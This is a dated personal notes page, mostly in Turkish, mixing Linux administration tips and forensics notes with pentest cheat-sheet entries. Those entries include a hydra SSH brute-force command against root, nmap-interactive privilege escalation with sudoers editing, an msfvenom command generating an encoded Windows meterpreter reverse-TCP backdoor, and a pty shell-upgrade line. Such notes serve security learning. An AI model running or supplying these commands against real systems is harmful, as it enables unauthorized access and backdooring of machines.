!! To Search : CTRL+ F !!
File transfer with ssh on linux command line
scp -r /path/source/remoteServer@IpAdress:/path/destination
2020
Linux Sistemlerde IP Forwarding Özelliğinin Yönetimi
- Ip Forwarding Özelliğinin Durumunu Sorgulamak İçin :
sysctl net.ipv4.ip_forward - Ip Forwarding Özelliğini Açmak İçin :
echo 1 > /proc/sys/net/ipv4/ip_forward - Ip Forwarding Özelliğini Kapatmak İçin :
echo 0 > /proc/sys/net/ipv4/ip_forward - Ip Forwarding Özelliği Kalıcı Olarak Açmak İçin :
/etc/sysctl.confdosyası içerisindeki#net.ipv4.ip_forward=1ifadesinin başındaki#karakterinin kaldırılması ve ağ servisinin yeniden başlatılması gereklidir. - Ağ Servisini Yeniden Başlatmak İçin :
service network restart
2020
Yaygın Olarak Kullanılan Pentest Araçları
https://prune2000.github.io/tools/pentest/
2020
CMDCHALLENGE
cmdchallenge.com sitesi üzerinden online olarak komut satırı üzerindeki hakimiyet geliştirilebilir. Özellikle yeni başlayanlar için yararlı olabileceğini düşünüyorum.
https://cmdchallenge.com/
2020
SVC War Conpensator
Statik bir VAR dengeleyici, yüksek voltajlı elektrik iletim şebekelerinde hızlı etkili reaktif güç sağlamak için bir dizi elektrikli cihazdır. SVC’ler voltajı, güç faktörünü, harmonikleri düzenleyen ve sistemi stabilize eden Esnek AC iletim sistemi cihazı ailesinin bir parçasıdır.
31.03.2020
$PATH
Terminalden komutlarının çalıştırılabilir dosya karşılıklarının bulunduğu dizinleri belirtir.
Eğer oluşturduğumuz bir scripti terminal üzerinden istediğimiz herhangibir dizindeyken çalıştırabilmek için script dosyamızı executable izin ayarlarını yaparak PATH’a belirttiğimiz /bin dosyasına eklememiz gerekir.
Geçerli terminal için komut eklemek istiyorsak, ilgili dizinimizi belirterek bu komutu çalıştırmamız gerekiyor.
export PATH=”/home/hbn/bin:$PATH”
Eğer sürekli olarak tüm shell’de kullanmak için bir komut eklemesi yapacaksak bu komutu .bashrc dosyasına eklemeliyiz.
25/12/2019
OPENDNS
OpenDns adresleri kullanılarak lokal erişim engelleri aşılabilir.
208.67.222.222 , 208.67.220.220
28/11/2019
MSI Steelseries Keyboard Manage for Linux Systems
30/10/2019
Basic Linux Privilege Escalation
17/07/2019
NetMRI Shell Escape / Privilege Escalation
26/06/2019
Manual of Sqlmap
https://github.com/sqlmapproject/sqlmap/wiki/Usage20/06/2019
Python RegEx (Regular Expression) Online Deneme Platformları
www.regex101.com
www.regexr.com
16/04/2019
Linux Sistemlerde DNS Ön Bellek Temizleme
>> Linux işletim sistemi kullanılan bilgisayarlarda DNS ön belleğini temizlemek için aşağıdaki komutlardan bir tanesini kullanabilirsiniz.
/etc/rc.d/init.d/nscd restart
nscd -i hosts
02/01/2019
SSH Bağlantısı Uzun Sürüyorsa …
>> SSH (Secure Shell) bağlantısının uzun bir zaman alması durumunda yani ssh login durumunda olması gerektiğinden daha uzun süre bekleniyorsa birşeylerin yolunda gitmediği düşünebilirsiniz.
Bu durumda yapmanız gereken CONFIG dosyasına aşağıdaki satırı eklemektir.
"UseDNS no"
25 Aralık 2018
nmap-interactive İle Yetki Yükseltme
[normaluser@localhost]$
nmap>
# whoami
root
Bu kısımda interactive uygulama elede ettikten sonra
vim /etc/sudoers
dosyasına erişip mevcut erişimimizin olduğu kullanıcıya root haklarını tanımlayabiliriz.
25 Aralık 2018
SSH Bağlantısı Kurmak İçin Kullanılan Komut
ssh [kullanıcı_adı]@IP_Adresi
Örneğin;
ssh user@192.168.56.102
22 Aralık 2018
SSH Portu Üzerinden Sunucuya Brute Force Saldırısı
hydra -t 40 -V -f -l root -x 3:7aA1.*-_@$&% [IP_Adresi] ssh
Komut kullanılarak Brute Force Saldırısı başlatılır.
-t 40 parametresi : 40 thread üzerinden root kullanıcısına parola deneme saldırısı yapılıyor.
-V parametresi : Deneme/Yanılma sonuçlarını ekrana yazdırıyoruz
-f parametresi : finish anlamına gelir.Parola eşleşmesi olursa saldırıyı durdurur.
-x parametresi : Saldırıda kullanılacak karakterler setini tanımlıyoruz.
(3:7) parametresi : Maksimum ve minimum parola uzunluklarını belirtiyoruz.
a —> a’dan z’ye kadar küçük harfler
A —> A’dan Z’ye kadar büyük harfler
1 —> 0 ile 9 arası sayı değerleri
.*-_@$&% —> Doğrudan tanımlanan özel karakterler
Bu saldırıda parola bilgisini elde etme garantisi verilebilir fakat işlem süresi mantık çerçevesini aşmaktadır.
Yaklaşık olarak 380.215.245.168.359 tane deneme söz konusudur.
19 Aralık 2018
Registry ShellBags
Windows işletim sistemi dosyaların boyutunu, sembollerini, adlarını ve mevcut klasörlerinin konumlarını (dizin bilgileri) Windows Explorer’da görüntüleyebilmek amacıyla ShallBag isimli registry dosyaları tutar.
İlgili dosyanın silinmesi durumunda bile bilgiler shallbag‘de tutulmaktadır.
HKEY_USERS / [Kullanıcı_adı] / Software / Microsoft / Windows / Shell
19 Aralık 2018
Outlook OST Dosyalarının Önemi !
Bu dosyalar Outlook Veri Dosyalarıdır.OST dosyaları çevrimdışı çalışmak ve varsayılan olarak ön belleğe alınmış olan Exchange modu kullanmak isterseniz işinize yarar.
Adli Bilişimci Gözünden : E-mail verileri , takvim içerikleri, hatırlatmalar gibi bilgileri OST dosyalarından elde edebiliriz.
17 Aralık 2018
Linux Üzerinden Uzak Mysql Sunucuya Bağlanma
mysql -h [Hedef IP Adresi] -u [Kullanıcı Adı] -p [Parola]
16 Aralık 2018
Linux Klavye Dilini Türkçe Olarak Değiştirme
setxkbmap tr
10 Aralık 2018
Mfsvenom ile Windows Platformlar için Backdoor Oluşturma
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP adresiniz] LPORT=[İletişimin kurulacağı port no] -f exe –platform windows -o /root/Desktop/backdoor.exe -e x86/shikata_ga_nai -i 20
3 Aralık 2018
Shell Alınan Sistemde Terminalin Spawn Edilmesi
Shell alınan bir sistemde Pseudo-terminal will not be allocated because stdin is not a terminal hatası alabiliriz.Bunun anlamı erişilen terminalin gerçek sistem terminali olmadığının fark edilmesidir.Bu hatayı atlatmak ve python pty.spawn ile gerçek bir terminal başlatmak için aşağıdaki komutu kullanabiliriz.
/use/bin/python -c ‘import pty; pty.spawn(“/bin/bash”)’